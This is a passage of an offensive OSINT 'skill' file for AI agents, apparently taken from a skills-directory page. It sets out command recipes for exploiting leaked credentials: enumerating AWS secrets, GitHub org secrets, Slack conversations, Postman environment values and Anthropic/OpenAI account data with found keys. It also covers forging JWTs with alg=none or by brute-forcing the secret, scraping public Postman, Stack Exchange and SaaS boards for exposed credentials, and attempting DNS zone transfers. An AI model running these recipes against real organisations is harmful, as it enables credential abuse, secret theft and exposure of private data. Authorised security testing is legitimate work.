# Read-only enumeration of common services (do not WRITE)
aws s3 ls
aws ec2 describe-instances --output table --query 'Reservations[*].Instances[*].[InstanceId,State.Name,Tags[?Key==`Name`].Value]'
aws secretsmanager list-secrets --query 'SecretList[*].Name'
aws ssm describe-parameters --query 'Parameters[*].Name'
aws lambda list-functions --query 'Functions[*].FunctionName'
aws rds describe-db-instances --query 'DBInstances[*].DBInstanceIdentifier'

# CloudTrail check — is logging on?
aws cloudtrail describe-trails

# Check MFA enforcement on the user
aws iam get-account-summary | jq '.SummaryMap.AccountMFAEnabled'
aws iam list-mfa-devices --user-name <username>

GitHub PAT — repo enum:

TOKEN="ghp_..."
H="Authorization: token $TOKEN"

# Scopes already captured from X-OAuth-Scopes header
curl -sk -m 10 -I -H "$H" https://api.github.com/user | grep -i 'X-OAuth-Scopes'

# All repos accessible (own + collaborator + org member)
curl -sk -m 10 -H "$H" "https://api.github.com/user/repos?affiliation=owner,collaborator,organization_member&per_page=100"

# Org memberships
curl -sk -m 10 -H "$H" "https://api.github.com/user/orgs"

# Per-org: members, repos, secrets (secrets endpoint is metadata-only — names not values)
ORG="<orgname>"
curl -sk -m 10 -H "$H" "https://api.github.com/orgs/$ORG/members"
curl -sk -m 10 -H "$H" "https://api.github.com/orgs/$ORG/repos?per_page=100"
curl -sk -m 10 -H "$H" "https://api.github.com/orgs/$ORG/actions/secrets"   # requires admin:org

# Per-repo workflow secrets (metadata)
REPO="<orgname/reponame>"
curl -sk -m 10 -H "$H" "https://api.github.com/repos/$REPO/actions/secrets"

Slack token — workspace enum:

TOKEN="xoxb-..."
H="Authorization: Bearer $TOKEN"

# auth.test already validated
# Identity details
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/users.identity" | jq .

# What conversations can I see? (sweeping check; respects scope)
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/conversations.list?types=public_channel,private_channel,mpim,im&limit=200" | jq '.channels[] | {id, name, is_private}'

# Workspace info
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/team.info" | jq .

# User list (only if scope includes users:read)
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/users.list?limit=100" | jq '.members[] | {name, real_name, is_admin}'

# DO NOT: chat.postMessage, files.upload, conversations.invite, etc.

JWT — full triage workflow:

JWT="eyJhbGciOiJIUzI1NiI..."

# Decode header
echo "$JWT" | cut -d. -f1 | base64 -d 2>/dev/null | jq .
# Look for: alg (none = critical, HS256/HS384/HS512 = symmetric, RS256/RS512 = asymmetric, ES256 = ECDSA)
# Look for: kid (key ID — possible JKU/X5U injection target)
# Look for: jku, x5u (JKU/X5U values — control these = sign attacker JWTs)

# Decode payload
echo "$JWT" | cut -d. -f2 | base64 -d 2>/dev/null | jq .
# Look for: exp (expired = downgraded), iat, nbf
# Look for: sub, iss, aud (identity disclosure)
# Look for: roles, scopes, permissions (privilege markers)
# Look for: sensitive claims (email, employee ID, SSN, etc.)

# Algorithm-confusion test (RS→HS)
# If alg is RS256, try crafting an HS256 token signed with the public key as secret
# Tools: jwt_tool, jwt-cracker

# Brute-force HS256 secret (if HS256 + short-secret suspicion)
hashcat -m 16500 "$JWT" /path/to/wordlist.txt
# Or: john --format=HMAC-SHA256 jwt-hash.txt --wordlist=...

# Check `none` algorithm bypass
# Re-encode header with alg=none and empty signature; some libraries accept
NEW_JWT=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 -w0 | tr -d '=' | tr '/+' '_-')
NEW_JWT="${NEW_JWT}.$(echo "$JWT" | cut -d. -f2)."
# Test against API

Postman PMAK — workspace enum:

PMAK="PMAK-..."
H="X-Api-Key: $PMAK"

# /me already done (validation)
curl -sk -m 10 -H "$H" https://api.getpostman.com/me | jq '.user'

# Workspaces
curl -sk -m 10 -H "$H" https://api.getpostman.com/workspaces | jq '.workspaces[] | {id, name, type}'

# Per-workspace collections
WS="<workspace-id>"
curl -sk -m 10 -H "$H" "https://api.getpostman.com/workspaces/$WS" | jq '.workspace.collections[]'
curl -sk -m 10 -H "$H" "https://api.getpostman.com/workspaces/$WS" | jq '.workspace.environments[]'

# Per-collection requests (where the secrets often live)
COL="<collection-id>"
curl -sk -m 10 -H "$H" "https://api.getpostman.com/collections/$COL" | jq '.collection.item[]'
# Run secret catalog over the JSON

# Environments (env vars often contain creds)
ENV="<environment-id>"
curl -sk -m 10 -H "$H" "https://api.getpostman.com/environments/$ENV" | jq '.environment.values[] | {key, value}'

Anthropic API key — usage enum:

KEY="sk-ant-api03-..."
H="x-api-key: $KEY"
A="anthropic-version: 2023-06-01"

# Models accessible
curl -sk -m 10 -H "$H" -H "$A" https://api.anthropic.com/v1/models | jq '.data[] | .id'

# Usage / quota (admin-scoped tokens only):
curl -sk -m 10 -H "$H" -H "$A" https://api.anthropic.com/v1/organizations/usage_report | jq .

# DO NOT: send actual completion requests against organization budget

OpenAI API key — usage enum:

KEY="sk-..."
H="Authorization: Bearer $KEY"

# Models
curl -sk -m 10 -H "$H" https://api.openai.com/v1/models | jq '.data | length'

# Org info (if key has org scope)
curl -sk -m 10 -H "$H" https://api.openai.com/v1/organizations | jq .

# Files / fine-tunes (sometimes contain training data with PII)
curl -sk -m 10 -H "$H" https://api.openai.com/v1/files | jq .
curl -sk -m 10 -H "$H" https://api.openai.com/v1/fine_tuning/jobs | jq .

Generic key — provenance enum:

  1. Find the consuming domain (where in JS bundle did the key appear? what URL is the bundle served from?).
  2. Check the API docs of the inferred service.
  3. If the key matches a known regex, lookup vendor-specific scope check.
  4. If unknown service, search GitHub for the key prefix (gh search code "<prefix>" --type=code).
  5. Identify scope before validating; some keys are write-broad on first use.

24. Postman Public Workspace Universal Search

Postman's public-search endpoint is unauthenticated and indexes every workspace marked public.

Verified endpoint shape (mid-2025 onward):

curl -sk -m 15 \
  "https://www.postman.com/_api/ws/proxy" \
  -H 'Content-Type: application/json' \
  -H 'X-Entity-Team-Id: 0' \
  -d '{
    "service":"search",
    "method":"POST",
    "path":"/search-all",
    "body":{
      "queryIndices":["collaboration.workspace","runtime.collection","runtime.request"],
      "queryText":"acme.com",
      "size":100,
      "from":0,
      "clientTraceId":"",
      "queryAllIndices":false,
      "domain":"public"
    }
  }' | jq '.data[]'

This proxies through Postman's web app to their internal search service. Pagination via from (0, 100, 200, ...).

If the proxy shape changes (it has historically): inspect a real search request from the Postman web UI:

  1. Open https://www.postman.com/explore in a browser.
  2. Open DevTools → Network tab.
  3. Search for any term.
  4. Find the request to _api/... — copy as cURL — adapt.

Per-workspace walk:

For each matching workspace ID:

WS_ID="<workspace-id>"
# Workspace metadata (name, description, team, visibility)
curl -sk -m 10 "https://www.postman.com/_api/workspace/$WS_ID" | jq .

# List collections + environments + monitors in workspace
curl -sk -m 10 "https://www.postman.com/_api/workspace/$WS_ID/collection" | jq '.[].id'
curl -sk -m 10 "https://www.postman.com/_api/workspace/$WS_ID/environment" | jq '.[].id'

# Per-collection: full content (requests, headers, scripts, env vars)
COL_ID="<collection-id>"
curl -sk -m 10 "https://www.postman.com/_api/collection/$COL_ID" | jq '.collection.item[]'

Ownership scoring signals:

  • Creator/team name mentions target domain or brand → strong.
  • Workspace name/description mentions target → strong.
  • Request URLs contain *.target.com → strongest signal (workspace is actively used against target's APIs).

Run secret catalog (§17) over every text blob extracted from the requests, env vars, pre-request scripts, and test scripts.


25. Stack Exchange OSINT Sweep

Stack Exchange and its sister sites collect code paste-ins from developers — many include secrets, internal hostnames, and proprietary code excerpts.

Sites to query (8 with highest signal):

stackoverflow.com
serverfault.com
dba.stackexchange.com
devops.stackexchange.com
security.stackexchange.com
superuser.com
sharepoint.stackexchange.com
salesforce.stackexchange.com

API:

GET https://api.stackexchange.com/2.3/search/advanced
   ?site=<site>
   &q=<target>
   &filter=withbody
   &pagesize=100

Code block extraction regex:

<pre><code>([\s\S]*?)</code></pre>

(Stack Exchange wraps code in <pre><code> HTML.)

Pipeline:

  1. Search each site for the target name, brand, root domain.
  2. Extract code blocks from body HTML.
  3. Run secret catalog (§17) over each block.
  4. Cross-reference post author email (where exposed in profile) against email_osint discoveries — confirms employee posting target's internal code.
  5. Extract hostnames from code blocks → upsert as subdomain assets.

Quota: Stack Exchange API permits 30 requests/day without a key; with a free key, 10,000/day. Throttle with 2-second min interval per call.


26. Public SaaS Collaboration Surfaces

Many SaaS collaboration tools allow public sharing. Dork them like search engines.

Platforms with high incident rate:

trello.com
notion.so / notion.site
*.atlassian.net           (Jira / Confluence)
miro.com
asana.com
clickup.com
airtable.com

Dork template:

site:{platform} "{target-keyword}"

Run via search-engine adapter (DDG default; Bing / Brave / Yandex / SerpAPI optional). The same classification logic from §18.7 applies.

Common findings:

  • Public Trello board with credentials in card titles or attached config files.
  • Public Notion page with internal SOPs, API keys in code blocks, customer data.
  • Public Confluence space with onboarding docs containing seed creds.
  • Public Miro board with architecture diagrams revealing internal hostnames.

27. Subdomain-Source Stack (Passive)

Practical "what actually returns useful data in 2026" reference, ordered by recall:

Source Tier Notes
crt.sh Free Best single source for cert-derived subdomains; frequently 502s during peak hours — see fallback chain below.
VirusTotal Freemium Domain → passive DNS history.
AlienVault OTX Free Passive DNS + URL data.
Shodan Paid (low tier) Subdomain enum via domain: filter.
BinaryEdge Paid Comparable to Shodan.
FOFA Freemium Strong China-side coverage.
ZoomEye Freemium Comparable to Shodan; CN-strong.
Netlas Paid Large-scale HTTP/DNS/cert pivots.
SecurityTrails Paid Passive DNS + asset discovery.
RapidDNS Free Public passive DNS.
Subfinder bundled Free Aggregates 30+ free sources via one CLI.
Amass Free Comparable, more thorough, slower.
Recon-ng Free Modular framework; many free providers built in.

DNS AXFR opportunism: for every name server discovered, attempt zone transfer:

dig @<ns-host> <target-domain> AXFR

Most NSs reject; those that don't = full zone disclosure (CRITICAL).

Brute-force tier: Subfinder/Subbrute against assetnote.io wordlists (best-curated public wordlist source).

27.0.1 crt.sh down? Fallback chain (try in order)

crt.sh runs on a single nginx in front of a busy Postgres; 502 / 503 / timeout in peak hours is routine. Don't retry-loop — pivot:

D="target.example"

# 1. Censys cert search (free 250 queries/month with key) — same data, different infra
censys search "names: ${D}" --index-type certificates --fields names | jq -r '.names[]' | sort -u

# 2. Cert Spotter API (sslmate) — free w/ rate limits
curl -sk "https://api.certspotter.com/v1/issuances?domain=${D}&include_subdomains=true&expand=dns_names" | \
  jq -r '.[].dns_names[]' | sort -u

# 3. CertStream archive (Calidog) — historical CT log mirror
curl -sk "https://crt.calidog.io/?q=${D}" | jq -r '.[].name_value' | sort -u

# 4. Subfinder bundled aggregator (uses 30+ sources internally — Chaos, Anubis, BinaryEdge, BufferOver, Censys, CertSpotter, Crobat, Crtsh, DNSDumpster, FOFA, Fullhunt, GitHub, HackerTarget, IntelX, PassiveTotal, Quake, Rapiddns, Shodan, Spyse, ThreatBook, ThreatMiner, URLScan, VirusTotal, WhoisXML, ZoomEye, etc.)
subfinder -d ${D} -all -recursive -silent

# 5. AlienVault OTX — free, no key
curl -sk "https://otx.alienvault.com/api/v1/indicators/domain/${D}/passive_dns" | \
  jq -r '.passive_dns[].hostname' | sort -u

# 6. ThreatMiner — free
curl -sk "https://api.threatminer.org/v2/d

> Content truncated for page performance. Open the source repository for the full SKILL.md file.
Install via CLI
npx skills add https://github.com/Undermybelt/hermes-skills --skill offensive-osint
Repository Details
star Stars 4
call_split Forks 1
navigation Branch main
article Path SKILL.md
More from Creator